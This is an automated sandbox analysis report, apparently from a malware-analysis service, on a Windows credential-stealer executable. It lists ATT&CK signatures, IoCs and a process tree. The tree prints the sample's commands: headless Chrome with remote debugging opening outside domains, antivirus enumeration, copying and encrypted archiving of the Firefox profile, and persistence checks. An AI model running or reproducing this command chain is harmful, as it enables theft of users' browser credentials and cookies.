bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40

Analysis

max time kernel
148s
max time network
151s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
02-08-2024 02:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
Size

8.0MB
MD5

7a9e91cd05bb23625354d0f46066904c
SHA1

7389f1881aba1c2ba3544321bd068bbf91dfa00a
SHA256

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40
SHA512

cdcd8c13f582682279463afc1a6196b65e127a0cb344632f1c2222f8f64793ae8c19547758eda94ece0bc9526b6ed13e552c3f6c9dbc2c6f157e601cbbc95c65
SSDEEP

49152:BYyqyQ4SjTErF0JwHoLjhbi4zmkKm0W85GNLZLgKT/MNMNngOdTMnWAqkeKbr3kg:PgR2HoLtb

Score

9^/10

credential_access discovery stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Uses browser remote debugging 2 TTPs 2 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

chrome.exechrome.exe

pid process

2000 chrome.exe
1888 chrome.exe
Executes dropped EXE 8 IoCs

Processes:

kedb.exea2-stl-0729-early-(1)-TESTED.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exekedb.exe7za.exe

pid process

792 kedb.exe
2920 a2-stl-0729-early-(1)-TESTED.exe
996 PsInfo.exe
1592 PsInfo64.exe
2624 PsInfo64.exe
2744 PsInfo64.exe
2276 kedb.exe
1688 7za.exe
Loads dropped DLL 4 IoCs

Processes:

chrome.execmd.exechrome.exe

pid process

2000 chrome.exe
2000 chrome.exe
2384 cmd.exe
1888 chrome.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
792	kedb.exe
2920	a2-stl-0729-early-(1)-TESTED.exe
996	PsInfo.exe
1592	PsInfo64.exe
2624	PsInfo64.exe
2744	PsInfo64.exe
2276	kedb.exe
1688	7za.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

kedb.exePsInfo.exekedb.exe7za.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PsInfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kedb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exeRobocopy.exe

pid process

1380 cmd.exe
2912 Robocopy.exe

pid	process
1380	cmd.exe
2912	Robocopy.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PsInfo64.exePsInfo64.exePsInfo64.exePsInfo.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	PsInfo64.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	PsInfo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	PsInfo64.exe

Delays execution with timeout.exe 18 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1004	timeout.exe
2508	timeout.exe
2976	timeout.exe
2316	timeout.exe
1672	timeout.exe
1600	timeout.exe
2880	timeout.exe
2688	timeout.exe
3008	timeout.exe
872	timeout.exe
2856	timeout.exe
2976	timeout.exe
1932	timeout.exe
1600	timeout.exe
1668	timeout.exe
2648	timeout.exe
2520	timeout.exe
2972	timeout.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2312 systeminfo.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs

Processes:

kedb.exePsInfo.exekedb.exe7za.exe

pid process

792 kedb.exe
996 PsInfo.exe
2276 kedb.exe
1688 7za.exe

pid	process
2312	systeminfo.exe

pid	process
792	kedb.exe
996	PsInfo.exe
2276	kedb.exe
1688	7za.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

chrome.exePsInfo.exePsInfo64.exePsInfo64.exePsInfo64.exechrome.exe

pid	process
2000	chrome.exe
996	PsInfo.exe
996	PsInfo.exe
1592	PsInfo64.exe
1592	PsInfo64.exe
2624	PsInfo64.exe
2624	PsInfo64.exe
2744	PsInfo64.exe
2744	PsInfo64.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe
1888	chrome.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

WMIC.exechrome.exeRobocopy.exe7za.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemProfilePrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeProfSingleProcessPrivilege	480	WMIC.exe
Token: SeIncBasePriorityPrivilege	480	WMIC.exe
Token: SeCreatePagefilePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeDebugPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeRemoteShutdownPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe
Token: 33	480	WMIC.exe
Token: 34	480	WMIC.exe
Token: 35	480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemProfilePrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeProfSingleProcessPrivilege	480	WMIC.exe
Token: SeIncBasePriorityPrivilege	480	WMIC.exe
Token: SeCreatePagefilePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeDebugPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeRemoteShutdownPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe
Token: 33	480	WMIC.exe
Token: 34	480	WMIC.exe
Token: 35	480	WMIC.exe
Token: 33	2000	chrome.exe
Token: SeIncBasePriorityPrivilege	2000	chrome.exe
Token: 33	2000	chrome.exe
Token: SeIncBasePriorityPrivilege	2000	chrome.exe
Token: 33	2000	chrome.exe
Token: SeIncBasePriorityPrivilege	2000	chrome.exe
Token: SeBackupPrivilege	2912	Robocopy.exe
Token: SeRestorePrivilege	2912	Robocopy.exe
Token: SeSecurityPrivilege	2912	Robocopy.exe
Token: SeTakeOwnershipPrivilege	2912	Robocopy.exe
Token: SeRestorePrivilege	1688	7za.exe
Token: 35	1688	7za.exe
Token: SeSecurityPrivilege	1688	7za.exe
Token: SeSecurityPrivilege	1688	7za.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exechrome.execmd.exe

description	pid	process	target process
PID 2292 wrote to memory of 2148	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2148	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2148	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2148 wrote to memory of 2648	2148	cmd.exe	timeout.exe
PID 2148 wrote to memory of 2648	2148	cmd.exe	timeout.exe
PID 2148 wrote to memory of 2648	2148	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2796	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2796	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2796	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2796 wrote to memory of 2880	2796	cmd.exe	timeout.exe
PID 2796 wrote to memory of 2880	2796	cmd.exe	timeout.exe
PID 2796 wrote to memory of 2880	2796	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2748	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2748	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2748	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2748 wrote to memory of 2688	2748	cmd.exe	timeout.exe
PID 2748 wrote to memory of 2688	2748	cmd.exe	timeout.exe
PID 2748 wrote to memory of 2688	2748	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2732	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2732	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2732	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2732 wrote to memory of 2520	2732	cmd.exe	timeout.exe
PID 2732 wrote to memory of 2520	2732	cmd.exe	timeout.exe
PID 2732 wrote to memory of 2520	2732	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2956	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2956	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2956	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2956 wrote to memory of 3008	2956	cmd.exe	timeout.exe
PID 2956 wrote to memory of 3008	2956	cmd.exe	timeout.exe
PID 2956 wrote to memory of 3008	2956	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2840	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2840	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2840	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2840 wrote to memory of 2976	2840	cmd.exe	timeout.exe
PID 2840 wrote to memory of 2976	2840	cmd.exe	timeout.exe
PID 2840 wrote to memory of 2976	2840	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2316	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2316	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 2316	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2316 wrote to memory of 1932	2316	cmd.exe	timeout.exe
PID 2316 wrote to memory of 1932	2316	cmd.exe	timeout.exe
PID 2316 wrote to memory of 1932	2316	cmd.exe	timeout.exe
PID 2292 wrote to memory of 288	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 288	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 2292 wrote to memory of 288	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	cmd.exe
PID 288 wrote to memory of 1600	288	cmd.exe	timeout.exe
PID 288 wrote to memory of 1600	288	cmd.exe	timeout.exe
PID 288 wrote to memory of 1600	288	cmd.exe	timeout.exe
PID 2292 wrote to memory of 2000	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	chrome.exe
PID 2292 wrote to memory of 2000	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	chrome.exe
PID 2292 wrote to memory of 2000	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	chrome.exe
PID 2292 wrote to memory of 2000	2292	bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe	chrome.exe
PID 2000 wrote to memory of 2700	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 2700	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 2700	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 1636	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 1636	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 1636	2000	chrome.exe	cmd.exe
PID 1636 wrote to memory of 480	1636	cmd.exe	WMIC.exe
PID 1636 wrote to memory of 480	1636	cmd.exe	WMIC.exe
PID 1636 wrote to memory of 480	1636	cmd.exe	WMIC.exe
PID 2000 wrote to memory of 2352	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 2352	2000	chrome.exe	cmd.exe
PID 2000 wrote to memory of 2352	2000	chrome.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe
"C:\Users\Admin\AppData\Local\Temp\bbbfdf66e9c773bcad95c6cd2e89a596620f417175de712269689b08f2643a40.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:2976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 10
2⤵
- Suspicious use of WriteProcessMemory
PID:288

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
3⤵
- Delays execution with timeout.exe
PID:1600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://trujillolauriannelamar.com
2⤵
- Uses browser remote debugging
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
3⤵
PID:2700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\868 2>&1
3⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\868 > C:\Users\Admin\AppData\Local\temp\418
3⤵
PID:2352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o bxlg.zip
3⤵
PID:2104

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o bxlg.zip
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg 2>&1
3⤵
PID:1684

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2312

C:\Windows\system32\findstr.exe
findstr /C:"OS Name"
4⤵
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 60
3⤵
PID:1368

C:\Windows\system32\timeout.exe
TIMEOUT /T 60
4⤵
- Delays execution with timeout.exe
PID:1672

C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe
"C:\Users\Admin\AppData\Local\temp\a2-stl-0729-early-(1)-TESTED.exe"
3⤵
- Executes dropped EXE
PID:2920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:1980

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2696

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2956

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2544

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2064

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2656

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:2316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:756

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TIMEOUT /T 5
4⤵
PID:2812

C:\Windows\system32\timeout.exe
TIMEOUT /T 5
5⤵
- Delays execution with timeout.exe
PID:1004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=old --disable-gpu --remote-debugging-port=0 http://annetteedgardomalcolm.com
4⤵
- Uses browser remote debugging
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C echo %userprofile% > C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout 2>&1
5⤵
PID:2212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit" & kedb.exe -o jucq_x64.zip
5⤵
PID:440

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe
kedb.exe -o jucq_x64.zip
6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1380

C:\Windows\system32\Robocopy.exe
robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe a "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\15F3E9984B173F13F3200333299737_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
5⤵
PID:2524

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\7za.exe a "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\15F3E9984B173F13F3200333299737_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
5⤵
PID:2760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\naopg"& "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\naopg"
3⤵
- Loads dropped DLL
PID:2384

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo.exe -s /accepteula applications
4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:996

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" -s /accepteula applications
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor > "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\naopg" & "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video >> "C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\naopg"
3⤵
PID:1632

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe -d /accepteula processor
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2624

C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe
"C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\PsInfo64.exe" /accepteula video
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2628

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:3040

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:1616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
3⤵
PID:2876

C:\Windows\system32\reg.exe
REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
4⤵
PID:2492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
3⤵
PID:2092

C:\Windows\system32\schtasks.exe
SCHTASKS /QUERY /TN MyTasks\VirtualComputerToolkit
4⤵
PID:2160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VirtualComputerToolkit
